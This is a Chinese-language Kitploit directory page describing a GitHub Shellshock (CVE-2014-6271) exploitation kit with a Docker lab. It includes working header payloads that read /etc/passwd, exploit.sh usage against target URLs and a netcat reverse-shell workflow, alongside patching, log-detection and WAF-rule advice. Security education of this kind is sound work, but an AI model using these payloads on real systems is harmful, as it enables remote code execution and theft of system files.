Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
bash-apocalypse — 重现 Shellshock(CVE-2014-6271)——曾危及数百万台服务器的 bash 漏洞。自动化利用工具包 + Burp Suite 方法论 + Docker 实验室。专为安全研究与教育而构建。进攻性安全作品集项目。 | Kitploit
工具/GitHubGitHub/mtaha-sec/bash-apocalypse
漏洞扫描器Payload生成漏洞利用IDS/IPS规避ShellcodeWeb应用程序漏洞利用渗透测试命令与控制错误配置学习与教育实验室与实践
GitHub
31个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
mtaha-sec/bash-apocalypse

bash-apocalypse

重现 Shellshock(CVE-2014-6271)——曾危及数百万台服务器的 bash 漏洞。自动化利用工具包 + Burp Suite 方法论 + Docker 实验室。专为安全研究与教育而构建。进攻性安全作品集项目。

查看仓库
分享

Bash 末日

针对 CVE-2014-6271 (Shellshock) 的自动化利用工具包

Severity CVSS Score

一个完整的安全研究项目,演示了 2014 年影响数百万台服务器的 Shellshock 漏洞。包含自动化扫描、利用能力和防御建议。

Demo


什么是 Shellshock?

Shellshock (CVE-2014-6271) 是 Bash shell 中的一个严重漏洞,允许通过环境变量操作实现远程代码执行。该漏洞在存在 22 年后于 2014 年被发现,影响了全球数百万台 Unix/Linux 系统。

工作原理:

root@kitploit:~
# Normal: Bash exports functions as environment variables
my_function='() { echo "hello"; }'

# The bug: Bash continues parsing after the function definition
exploit='() { :;}; echo "PWNED"'  # The second command executes

使用 CGI 的 Web 服务器会将 HTTP 头作为环境变量传递给 Bash,从而使其易受攻击:

root@kitploit:~
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'

快速开始

root@kitploit:~
# Clone and setup git clone https://github.com/YOUR-USERNAME/bash-apocalypse.git cd bash-apocalypse # Start vulnerable lab docker-compose up -d # Run exploit chmod +x exploit.sh ./exploit.sh --url http://localhost:8080/cgi-bin/test.cgi --cmd "whoami"

功能特性

自动化扫描器

  • 发现易受攻击的 CGI 端点
  • 测试多个注入点(User-Agent、Referer、Cookie)
  • 支持自定义字典

利用工具

  • 命令执行并捕获输出
  • 自动化反弹 Shell
  • 多种载荷选项

实验环境

  • 单命令 Docker 搭建
  • 隔离的易受攻击服务器
  • 安全的测试环境

使用方法

扫描漏洞

root@kitploit:~
./exploit.sh --scan --target localhost --port 8080

执行命令

root@kitploit:~
./exploit.sh --url http://target/cgi-bin/test.cgi --cmd "id"

获取反弹 Shell

root@kitploit:~
# Terminal 1
nc -lvnp 4444

# Terminal 2
./exploit.sh --url http://target/cgi-bin/test.cgi --reverse-shell YOUR_IP:4444

手动利用(Burp Suite)

第 1 步:拦截请求

Burp Intercept

第 2 步:注入载荷

Exploitation

修改 User-Agent 头:

root@kitploit:~
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'

第 3 步:观察响应

Reverse Shell

服务器会执行你的命令并返回输出。


技术分析

攻击流程

root@kitploit:~
Client (Attacker)
    │
    │ HTTP Request with malicious User-Agent
    ▼
Web Server
    │
    │ Passes header as environment variable
    ▼
CGI Script
    │
    │ Spawns Bash process
    ▼
Bash Shell
    │
    │ Parses function + executes trailing commands
    ▼
Command Execution (RCE)

根本原因

当 Bash 在环境变量中遇到函数定义时:

  1. 它解析函数:() { :;}
  2. 缺陷: 它会继续解析并执行后面的任何内容
  3. 结果:任意命令执行

防御措施

立即缓解

root@kitploit:~
# Update Bash
sudo apt-get update && sudo apt-get upgrade bash

# Disable CGI if not needed
sudo a2dismod cgi && sudo systemctl restart apache2

检测

root@kitploit:~
# Check logs for exploitation attempts
grep -E "\\(\\)|\\{.*\\}" /var/log/apache2/access.log

WAF 规则

root@kitploit:~
SecRule REQUEST_HEADERS "\\(\\).*\\{" "deny,status:403,msg:'Shellshock Attack'"

演示的技能

  • Web 应用程序渗透测试
  • Bash 脚本编写与自动化
  • HTTP 协议操作
  • Docker 容器化
  • 熟练使用 Burp Suite
  • 攻防两端的网络安全知识

项目结构

root@kitploit:~
bash-apocalypse/
├── README.md
├── exploit.sh              # Main tool
├── payloads.txt            # Test payloads
├── docker-compose.yml      # Lab setup
└── screenshots/
    ├── intercept.png
    ├── Payload.png
    └── result.png

法律免责声明

仅供教育用途。 仅可测试你拥有或获得明确授权测试的系统。未经授权的访问属于违法行为。


参考资料

  • CVE-2014-6271 详情
  • Cloudflare:深入解析 Shellshock
  • 练习:HackTheBox - Shocker

旨在理解漏洞的工作原理以及如何防御它们。 ;)

下载工具